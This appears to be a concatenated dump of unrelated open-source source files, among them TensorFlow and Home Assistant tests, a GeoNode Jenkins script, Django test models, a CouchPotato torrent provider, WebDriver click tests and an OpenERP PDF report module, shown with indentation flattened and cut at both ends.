sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
sess = sm.prepare_session(
"", init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
saver = saver_lib.Saver({"v": v})
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = variables.VariableV1([6.0, 7.0, 8.0], name="v")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
saver = saver_lib.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
@test_util.run_v1_only("b/120545219")
def testRecoverSession(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
try:
gfile.DeleteRecursively(checkpoint_dir)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess,
os.path.join(checkpoint_dir, "recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
v = variables.VariableV1(2, name="v")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
@test_util.run_v1_only("b/120545219")
def testWaitForSessionReturnsNoneAfterTimeout(self):
with ops.Graph().as_default():
variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
if __name__ == "__main__":
test.main()
|
apache-2.0
|
jj0hns0n/geonode
|
scripts/cloud/demo_site.py
|
24
|
3716
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import json
import jenkins
import sys
from optparse import OptionParser
from six.moves.urllib.request import Request
JENKINS_IP = 'http://52.7.139.177/'
GEONODE_DEMO_DOMAIN = 'demo.geonode.org' # should match the jenkins configuration
NODE_LIST = 'computer/api/json' # jenkins api backend
GEONODE_DEMO_JOB = 'geonode-aws' # jenkins job name for demo site
## USAGE
# python demo_site.py -u username -t jenkins_api_token task
# task can be either "redeploy-demo-site", "build-demo-job"
class DemoGeonode(object):
"""
This class allows interaction with the Jenkins APIs to do several tasks,
for a more detailed guide on how to use self.j see
https://python-jenkins.readthedocs.org/en/latest/api.html
"""
def __init__(self, username, token):
self.j = jenkins.Jenkins(JENKINS_IP, username, token)
def redeployDemo(self):
"""Delete the jenkins node on which runs the amazon VM,
this will both shutdown the VM and create a new one with a fresh geonode instance"""
nodes_data = json.loads(self.j.jenkins_open(Request(self.j.server + NODE_LIST)))
demo_node = self.getDemoNode(nodes_data)
if demo_node is not None:
self.deleteNode(demo_node)
self.buildJob(GEONODE_DEMO_JOB)
print 're-deploy complete!'
else:
print 'No demo.genode.org node found on jenkins'
def getDemoNode(self, nodes_data):
"""Commodity method to get the correct jenkins node name,
the name is composed by 'demo.geonode.org' and the VM id"""
demo_node = None
for node in nodes_data['computer']:
if GEONODE_DEMO_DOMAIN in node['displayName']:
demo_node = node['displayName']
return demo_node
def deleteNode(self, node_name):
"""Delete the jenkins node and shutdown the amazon VM"""
print 'Deleting demo node'
self.j.delete_node(node_name)
print 'Deletion requested'
def buildJob(self, job):
"""Trigger a job build"""
print 'Building %s job' % job
self.j.build_job(job)
print 'Build requested'
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-u", "--username", dest="username",
help="jenkins username")
parser.add_option("-t", "--token", dest="token",
help="jenkins access token")
(options, args) = parser.parse_args()
if options.username is not None and options.token is not None:
task = sys.argv[-1]
demo = DemoGeonode(options.username, options.token)
if task == 'redeploy-demo-site':
demo.redeployDemo()
elif task == 'build-demo-job':
demo.buildJob(GEONODE_DEMO_JOB)
else:
print 'Command not found'
else:
print 'username and access token are both required'
|
gpl-3.0
|
tinloaf/home-assistant
|
tests/components/test_system_log.py
|
1
|
9023
|
"""Test system log component."""
import logging
from unittest.mock import MagicMock, patch
from homeassistant.core import callback
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import system_log
_LOGGER = logging.getLogger('test_logger')
BASIC_CONFIG = {
'system_log': {
'max_entries': 2,
}
}
async def get_error_log(hass, hass_client, expected_count):
"""Fetch all entries from system_log via the API."""
client = await hass_client()
resp = await client.get('/api/error/all')
assert resp.status == 200
data = await resp.json()
assert len(data) == expected_count
return data
def _generate_and_log_exception(exception, log):
try:
raise Exception(exception)
except: # noqa: E722 pylint: disable=bare-except
_LOGGER.exception(log)
def assert_log(log, exception, message, level):
"""Assert that specified values are in a specific log entry."""
assert exception in log['exception']
assert message == log['message']
assert level == log['level']
assert 'timestamp' in log
def get_frame(name):
"""Get log stack frame."""
return (name, None, None, None)
async def test_normal_logs(hass, hass_client):
"""Test that debug and info are not logged."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.debug('debug')
_LOGGER.info('info')
# Assert done by get_error_log
await get_error_log(hass, hass_client, 0)
async def test_exception(hass, hass_client):
"""Test that exceptions are logged and retrieved correctly."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_generate_and_log_exception('exception message', 'log message')
log = (await get_error_log(hass, hass_client, 1))[0]
assert_log(log, 'exception message', 'log message', 'ERROR')
async def test_warning(hass, hass_client):
"""Test that warning are logged and retrieved correctly."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.warning('warning message')
log = (await get_error_log(hass, hass_client, 1))[0]
assert_log(log, '', 'warning message', 'WARNING')
async def test_error(hass, hass_client):
"""Test that errors are logged and retrieved correctly."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.error('error message')
log = (await get_error_log(hass, hass_client, 1))[0]
assert_log(log, '', 'error message', 'ERROR')
async def test_config_not_fire_event(hass):
"""Test that errors are not posted as events with default config."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
events = []
@callback
def event_listener(event):
"""Listen to events of type system_log_event."""
events.append(event)
hass.bus.async_listen(system_log.EVENT_SYSTEM_LOG, event_listener)
_LOGGER.error('error message')
await hass.async_block_till_done()
assert len(events) == 0
async def test_error_posted_as_event(hass):
"""Test that error are posted as events."""
await async_setup_component(hass, system_log.DOMAIN, {
'system_log': {
'max_entries': 2,
'fire_event': True,
}
})
events = []
@callback
def event_listener(event):
"""Listen to events of type system_log_event."""
events.append(event)
hass.bus.async_listen(system_log.EVENT_SYSTEM_LOG, event_listener)
_LOGGER.error('error message')
await hass.async_block_till_done()
assert len(events) == 1
assert_log(events[0].data, '', 'error message', 'ERROR')
async def test_critical(hass, hass_client):
"""Test that critical are logged and retrieved correctly."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.critical('critical message')
log = (await get_error_log(hass, hass_client, 1))[0]
assert_log(log, '', 'critical message', 'CRITICAL')
async def test_remove_older_logs(hass, hass_client):
"""Test that older logs are rotated out."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.error('error message 1')
_LOGGER.error('error message 2')
_LOGGER.error('error message 3')
log = await get_error_log(hass, hass_client, 2)
assert_log(log[0], '', 'error message 3', 'ERROR')
assert_log(log[1], '', 'error message 2', 'ERROR')
async def test_clear_logs(hass, hass_client):
"""Test that the log can be cleared via a service call."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.error('error message')
hass.async_add_job(
hass.services.async_call(
system_log.DOMAIN, system_log.SERVICE_CLEAR, {}))
await hass.async_block_till_done()
# Assert done by get_error_log
await get_error_log(hass, hass_client, 0)
async def test_write_log(hass):
"""Test that error propagates to logger."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
logger = MagicMock()
with patch('logging.getLogger', return_value=logger) as mock_logging:
hass.async_add_job(
hass.services.async_call(
system_log.DOMAIN, system_log.SERVICE_WRITE,
{'message': 'test_message'}))
await hass.async_block_till_done()
mock_logging.assert_called_once_with(
'homeassistant.components.system_log.external')
assert logger.method_calls[0] == ('error', ('test_message',))
async def test_write_choose_logger(hass):
"""Test that correct logger is chosen."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
with patch('logging.getLogger') as mock_logging:
hass.async_add_job(
hass.services.async_call(
system_log.DOMAIN, system_log.SERVICE_WRITE,
{'message': 'test_message',
'logger': 'myLogger'}))
await hass.async_block_till_done()
mock_logging.assert_called_once_with(
'myLogger')
async def test_write_choose_level(hass):
"""Test that correct logger is chosen."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
logger = MagicMock()
with patch('logging.getLogger', return_value=logger):
hass.async_add_job(
hass.services.async_call(
system_log.DOMAIN, system_log.SERVICE_WRITE,
{'message': 'test_message',
'level': 'debug'}))
await hass.async_block_till_done()
assert logger.method_calls[0] == ('debug', ('test_message',))
async def test_unknown_path(hass, hass_client):
"""Test error logged from unknown path."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
_LOGGER.findCaller = MagicMock(
return_value=('unknown_path', 0, None, None))
_LOGGER.error('error message')
log = (await get_error_log(hass, hass_client, 1))[0]
assert log['source'] == 'unknown_path'
def log_error_from_test_path(path):
"""Log error while mocking the path."""
call_path = 'internal_path.py'
with patch.object(_LOGGER,
'findCaller',
MagicMock(return_value=(call_path, 0, None, None))):
with patch('traceback.extract_stack',
MagicMock(return_value=[
get_frame('main_path/main.py'),
get_frame(path),
get_frame(call_path),
get_frame('venv_path/logging/log.py')])):
_LOGGER.error('error message')
async def test_homeassistant_path(hass, hass_client):
"""Test error logged from homeassistant path."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
with patch('homeassistant.components.system_log.HOMEASSISTANT_PATH',
new=['venv_path/homeassistant']):
log_error_from_test_path(
'venv_path/homeassistant/component/component.py')
log = (await get_error_log(hass, hass_client, 1))[0]
assert log['source'] == 'component/component.py'
async def test_config_path(hass, hass_client):
"""Test error logged from config path."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
with patch.object(hass.config, 'config_dir', new='config'):
log_error_from_test_path('config/custom_component/test.py')
log = (await get_error_log(hass, hass_client, 1))[0]
assert log['source'] == 'custom_component/test.py'
async def test_netdisco_path(hass, hass_client):
"""Test error logged from netdisco path."""
await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
with patch.dict('sys.modules',
netdisco=MagicMock(__path__=['venv_path/netdisco'])):
log_error_from_test_path('venv_path/netdisco/disco_component.py')
log = (await get_error_log(hass, hass_client, 1))[0]
assert log['source'] == 'disco_component.py'
|
apache-2.0
|
wraiden/spacewalk
|
client/rhel/rhn-client-tools/src/actions/hardware.py
|
3
|
1142
|
#!/usr/bin/python
# Copyright (c) 1999--2016 Red Hat, Inc. Distributed under GPLv2.
#
# Author: Adrian Likins <[email protected]>
# imports are a bit weird here to avoid name collions on "harware"
import sys
sys.path.append("/usr/share/rhn/")
from up2date_client import hardware
from up2date_client import up2dateAuth
from up2date_client import rpcServer
argVerbose = 0
__rhnexport__ = [
'refresh_list' ]
# resync hardware information with the server profile
def refresh_list(cache_only=None):
if cache_only:
return (0, "no-ops for caching", {})
# read all hardware in
hardwareList = hardware.Hardware()
s = rpcServer.getServer()
if argVerbose > 1:
print("Called refresh_hardware")
try:
s.registration.refresh_hw_profile(up2dateAuth.getSystemId(),
hardwareList)
except:
print("ERROR: sending hardware database for System Profile")
return (12, "Error refreshing system hardware", {})
return (0, "hardware list refreshed", {})
def main():
print(refresh_list())
if __name__ == "__main__":
main()
|
gpl-2.0
|
risicle/django
|
tests/managers_regress/models.py
|
245
|
3566
|
"""
Various edge-cases for model managers.
"""
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
class OnlyFred(models.Manager):
def get_queryset(self):
return super(OnlyFred, self).get_queryset().filter(name='fred')
class OnlyBarney(models.Manager):
def get_queryset(self):
return super(OnlyBarney, self).get_queryset().filter(name='barney')
class Value42(models.Manager):
def get_queryset(self):
return super(Value42, self).get_queryset().filter(value=42)
class AbstractBase1(models.Model):
name = models.CharField(max_length=50)
class Meta:
abstract = True
# Custom managers
manager1 = OnlyFred()
manager2 = OnlyBarney()
objects = models.Manager()
class AbstractBase2(models.Model):
value = models.IntegerField()
class Meta:
abstract = True
# Custom manager
restricted = Value42()
# No custom manager on this class to make sure the default case doesn't break.
class AbstractBase3(models.Model):
comment = models.CharField(max_length=50)
class Meta:
abstract = True
@python_2_unicode_compatible
class Parent(models.Model):
name = models.CharField(max_length=50)
manager = OnlyFred()
def __str__(self):
return self.name
# Managers from base classes are inherited and, if no manager is specified
# *and* the parent has a manager specified, the first one (in the MRO) will
# become the default.
@python_2_unicode_compatible
class Child1(AbstractBase1):
data = models.CharField(max_length=25)
def __str__(self):
return self.data
@python_2_unicode_compatible
class Child2(AbstractBase1, AbstractBase2):
data = models.CharField(max_length=25)
def __str__(self):
return self.data
@python_2_unicode_compatible
class Child3(AbstractBase1, AbstractBase3):
data = models.CharField(max_length=25)
def __str__(self):
return self.data
@python_2_unicode_compatible
class Child4(AbstractBase1):
data = models.CharField(max_length=25)
# Should be the default manager, although the parent managers are
# inherited.
default = models.Manager()
def __str__(self):
return self.data
@python_2_unicode_compatible
class Child5(AbstractBase3):
name = models.CharField(max_length=25)
default = OnlyFred()
objects = models.Manager()
def __str__(self):
return self.name
# Will inherit managers from AbstractBase1, but not Child4.
class Child6(Child4):
value = models.IntegerField()
# Will not inherit default manager from parent.
class Child7(Parent):
pass
# RelatedManagers
@python_2_unicode_compatible
class RelatedModel(models.Model):
test_gfk = GenericRelation('RelationModel', content_type_field='gfk_ctype', object_id_field='gfk_id')
exact = models.NullBooleanField()
def __str__(self):
return force_text(self.pk)
@python_2_unicode_compatible
class RelationModel(models.Model):
fk = models.ForeignKey(RelatedModel, models.CASCADE, related_name='test_fk')
m2m = models.ManyToManyField(RelatedModel, related_name='test_m2m')
gfk_ctype = models.ForeignKey(ContentType, models.SET_NULL, null=True)
gfk_id = models.IntegerField(null=True)
gfk = GenericForeignKey(ct_field='gfk_ctype', fk_field='gfk_id')
def __str__(self):
return force_text(self.pk)
|
bsd-3-clause
|
bverburg/CouchPotatoServer
|
couchpotato/core/media/_base/providers/torrent/hdbits.py
|
45
|
4648
|
import re
import json
import traceback
from couchpotato.core.helpers.variable import tryInt, getIdentifier
from couchpotato.core.logger import CPLog
from couchpotato.core.media._base.providers.torrent.base import TorrentProvider
log = CPLog(__name__)
class Base(TorrentProvider):
urls = {
'test': 'https://hdbits.org/',
'detail': 'https://hdbits.org/details.php?id=%s',
'download': 'https://hdbits.org/download.php?id=%s&passkey=%s',
'api': 'https://hdbits.org/api/torrents'
}
http_time_between_calls = 1 # Seconds
def _post_query(self, **params):
post_data = {
'username': self.conf('username'),
'passkey': self.conf('passkey')
}
post_data.update(params)
if self.conf('internal_only'):
post_data.update({'origin': [1]})
try:
result = self.getJsonData(self.urls['api'], data = json.dumps(post_data))
if result:
if result['status'] != 0:
log.error('Error searching hdbits: %s' % result['message'])
else:
return result['data']
except:
pass
return None
def _search(self, movie, quality, results):
match = re.match(r'tt(\d{7})', getIdentifier(movie))
data = self._post_query(imdb = {'id': match.group(1)})
if data:
try:
for result in data:
results.append({
'id': result['id'],
'name': result['name'],
'url': self.urls['download'] % (result['id'], self.conf('passkey')),
'detail_url': self.urls['detail'] % result['id'],
'size': tryInt(result['size']) / 1024 / 1024,
'seeders': tryInt(result['seeders']),
'leechers': tryInt(result['leechers'])
})
except:
log.error('Failed getting results from %s: %s', (self.getName(), traceback.format_exc()))
config = [{
'name': 'hdbits',
'groups': [
{
'tab': 'searcher',
'list': 'torrent_providers',
'name': 'HDBits',
'wizard': True,
'description': '<a href="http://hdbits.org">HDBits</a>',
'icon': 'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAABi0lEQVR4AZWSzUsbQRjGdyabTcvSNPTSHlpQQeMHJApC8CJRvHgQQU969+LJP8G7f4N3DwpeFRQvRr0EKaUl0ATSpkigUNFsMl/r9NmZLCEHA/nNO5PfvMPDm0DI6fV3ZxiolEICe1oZCBVCCmBPKwOh2ErKBHGE4KYEXBpSLkUlqO4LcM7f+6nVhRnOhSkOz/hexk+tL+YL0yPF2YmN4tynD++4gTLGkNNac9YFLoREBR1+cnF3dFY6v/m6PD+FaXiNJtgA4xYbABxiGrz6+6HWaI5/+Qh37YS0/3Znc8UxwNGBIIBX22z+/ZdJ+4wzyjpR4PEpODg8tgUXBv2iWUzSpa12B0IR6n6lvt8Aek2lZHb084+fdRNgrwY8z81PjhVy2d2ttUrtV/lbBa+JXGEpDMPnoF2tN1QYRqVUtf6nFbThb7wk7le395elcqhASLb39okDiHY00VCtCTEHwSiH4AI0lkOiT1dwMeSfT3SRxiQWNO7Zwj1egkoVIQFMKvSiC3bcjXq9Jf8DcDIRT3hh10kAAAAASUVORK5CYII=',
'options': [
{
'name': 'enabled',
'type': 'enabler',
'default': False,
},
{
'name': 'username',
'default': '',
},
{
'name': 'passkey',
'default': '',
},
{
'name': 'seed_ratio',
'label': 'Seed ratio',
'type': 'float',
'default': 1,
'description': 'Will not be (re)moved until this seed ratio is met.',
},
{
'name': 'seed_time',
'label': 'Seed time',
'type': 'int',
'default': 40,
'description': 'Will not be (re)moved until this seed time (in hours) is met.',
},
{
'name': 'extra_score',
'advanced': True,
'label': 'Extra Score',
'type': 'int',
'default': 0,
'description': 'Starting score for each release found via this provider.',
},
{
'name': 'internal_only',
'advanced': True,
'label': 'Internal Only',
'type': 'bool',
'default': False,
'description': 'Only download releases marked as HDBits internal'
}
],
},
],
}]
|
gpl-3.0
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/contracts/testing/utils.py
|
3
|
1693
|
from ..interface import (ContractSyntaxError, describe_value,
ContractNotRespected)
from ..main import parse_contract_string, check_contracts
def check_contracts_ok(contract, value):
if isinstance(contract, str):
contract = [contract]
value = [value]
context = check_contracts(contract, value)
assert isinstance(context, dict)
"%s" % context
"%r" % context
def check_contracts_fail(contract, value, error=ContractNotRespected):
""" Returns the exception """
if isinstance(contract, str):
contract = [contract]
value = [value]
try:
context = check_contracts(contract, value)
msg = ('I was expecting that the values would not not'
' satisfy the contract.\n')
for v in value:
msg += ' value: %s\n' % describe_value(v)
for c in contract:
cp = parse_contract_string(c)
msg += ' contract: %r, parsed as %r (%s)\n' % (c, cp, cp)
msg += ' context: %r\n' % context
raise Exception(msg)
except error as e:
# Try generation of strings:
s = "%r" % e # @UnusedVariable
s = "%s" % e # @UnusedVariable
return e
def check_syntax_fail(string):
assert isinstance(string, str)
try:
parsed_contract = parse_contract_string(string)
msg = 'I would not expect to parse %r.' % string
msg += ' contract: %s\n' % parsed_contract
raise Exception(msg)
except ContractSyntaxError as e:
# Try generation of strings:
s = "%r" % e # @UnusedVariable
s = "%s" % e # @UnusedVariable
pass
|
agpl-3.0
|
splav/servo
|
tests/wpt/web-platform-tests/webdriver/tests/element_click/interactability.py
|
20
|
3922
|
import pytest
from tests.support.asserts import assert_error, assert_success
from tests.support.inline import inline
def element_click(session, element):
return session.transport.send(
"POST", "session/{session_id}/element/{element_id}/click".format(
session_id=session.session_id,
element_id=element.id))
def test_display_none(session):
session.url = inline("""<button style="display: none">foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_visibility_hidden(session):
session.url = inline("""<button style="visibility: hidden">foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_hidden(session):
session.url = inline("<button hidden>foobar</button>")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_disabled(session):
session.url = inline("""<button disabled>foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_success(response)
@pytest.mark.parametrize("transform", ["translate(-100px, -100px)", "rotate(50deg)"])
def test_element_not_interactable_css_transform(session, transform):
session.url = inline("""
<div style="width: 500px; height: 100px;
background-color: blue; transform: {transform};">
<input type=button>
</div>""".format(transform=transform))
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_element_not_interactable_out_of_view(session):
session.url = inline("""
<style>
input {
position: absolute;
margin-top: -100vh;
background: red;
}
</style>
<input>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
@pytest.mark.parametrize("tag_name", ["div", "span"])
def test_zero_sized_element(session, tag_name):
session.url = inline("<{0}></{0}>".format(tag_name))
element = session.find.css(tag_name, all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_element_intercepted(session):
session.url = inline("""
<style>
div {
position: absolute;
height: 100vh;
width: 100vh;
background: blue;
top: 0;
left: 0;
}
</style>
<input type=button value=Roger>
<div></div>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_intercepted_no_pointer_events(session):
session.url = inline("""<input type=button value=Roger style="pointer-events: none">""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_not_visible_overflow_hidden(session):
session.url = inline("""
<style>
div {
overflow: hidden;
height: 50px;
background: green;
}
input {
margin-top: 100px;
background: red;
}
</style>
<div><input></div>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
|
mpl-2.0
|
tedi3231/openerp
|
build/lib/openerp/addons/report_webkit/webkit_report.py
|
4
|
14795
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Nicolas Bessi (Camptocamp)
# Contributor(s) : Florent Xicluna (Wingo SA)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import subprocess
import os
import sys
from openerp import report
import tempfile
import time
import logging
from mako.template import Template
from mako.lookup import TemplateLookup
from mako import exceptions
from openerp import netsvc
from openerp import pooler
from report_helper import WebKitHelper
from openerp.report.report_sxw import *
from openerp import addons
from openerp import tools
from openerp.tools.translate import _
from openerp.osv.osv import except_osv
_logger = logging.getLogger(__name__)
def mako_template(text):
"""Build a Mako template.
This template uses UTF-8 encoding
"""
tmp_lookup = TemplateLookup() #we need it in order to allow inclusion and inheritance
return Template(text, input_encoding='utf-8', output_encoding='utf-8', lookup=tmp_lookup)
class WebKitParser(report_sxw):
"""Custom class that use webkit to render HTML reports
Code partially taken from report openoffice. Thanks guys :)
"""
def __init__(self, name, table, rml=False, parser=False,
header=True, store=False):
self.parser_instance = False
self.localcontext = {}
report_sxw.__init__(self, name, table, rml, parser,
header, store)
def get_lib(self, cursor, uid):
"""Return the lib wkhtml path"""
proxy = self.pool.get('ir.config_parameter')
webkit_path = proxy.get_param(cursor, uid, 'webkit_path')
if not webkit_path:
try:
defpath = os.environ.get('PATH', os.defpath).split(os.pathsep)
if hasattr(sys, 'frozen'):
defpath.append(os.getcwd())
if tools.config['root_path']:
defpath.append(os.path.dirname(tools.config['root_path']))
webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath))
except IOError:
webkit_path = None
if webkit_path:
return webkit_path
raise except_osv(
_('Wkhtmltopdf library path is not set'),
_('Please install executable on your system' \
' (sudo apt-get install wkhtmltopdf) or download it from here:' \
' http://code.google.com/p/wkhtmltopdf/downloads/list and set the' \
' path in the ir.config_parameter with the webkit_path key.' \
'Minimal version is 0.9.9')
)
def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False):
"""Call webkit in order to generate pdf"""
if not webkit_header:
webkit_header = report_xml.webkit_header
tmp_dir = tempfile.gettempdir()
out_filename = tempfile.mktemp(suffix=".pdf", prefix="webkit.tmp.")
file_to_del = [out_filename]
if comm_path:
command = [comm_path]
else:
command = ['wkhtmltopdf']
command.append('--quiet')
# default to UTF-8 encoding. Use <meta charset="latin-1"> to override.
command.extend(['--encoding', 'utf-8'])
if header :
head_file = file( os.path.join(
tmp_dir,
str(time.time()) + '.head.html'
),
'w'
)
head_file.write(header)
head_file.close()
file_to_del.append(head_file.name)
command.extend(['--header-html', head_file.name])
if footer :
foot_file = file( os.path.join(
tmp_dir,
str(time.time()) + '.foot.html'
),
'w'
)
foot_file.write(footer)
foot_file.close()
file_to_del.append(foot_file.name)
command.extend(['--footer-html', foot_file.name])
if webkit_header.margin_top :
command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')])
if webkit_header.margin_bottom :
command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')])
if webkit_header.margin_left :
command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')])
if webkit_header.margin_right :
command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')])
if webkit_header.orientation :
command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')])
if webkit_header.format :
command.extend(['--page-size', str(webkit_header.format).replace(',', '.')])
count = 0
for html in html_list :
html_file = file(os.path.join(tmp_dir, str(time.time()) + str(count) +'.body.html'), 'w')
count += 1
html_file.write(html)
html_file.close()
file_to_del.append(html_file.name)
command.append(html_file.name)
command.append(out_filename)
stderr_fd, stderr_path = tempfile.mkstemp(text=True)
file_to_del.append(stderr_path)
try:
status = subprocess.call(command, stderr=stderr_fd)
os.close(stderr_fd) # ensure flush before reading
stderr_fd = None # avoid closing again in finally block
fobj = open(stderr_path, 'r')
error_message = fobj.read()
fobj.close()
if not error_message:
error_message = _('No diagnosis message was provided')
else:
error_message = _('The following diagnosis message was provided:\n') + error_message
if status :
raise except_osv(_('Webkit error' ),
_("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message))
pdf_file = open(out_filename, 'rb')
pdf = pdf_file.read()
pdf_file.close()
finally:
if stderr_fd is not None:
os.close(stderr_fd)
for f_to_del in file_to_del:
try:
os.unlink(f_to_del)
except (OSError, IOError), exc:
_logger.error('cannot remove file %s: %s', f_to_del, exc)
return pdf
def translate_call(self, src):
"""Translate String."""
ir_translation = self.pool.get('ir.translation')
res = ir_translation._get_source(self.parser_instance.cr, self.parser_instance.uid,
None, 'report', self.parser_instance.localcontext.get('lang', 'en_US'), src)
if not res :
return src
return res
# override needed to keep the attachments storing procedure
def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None):
"""generate the PDF"""
if context is None:
context={}
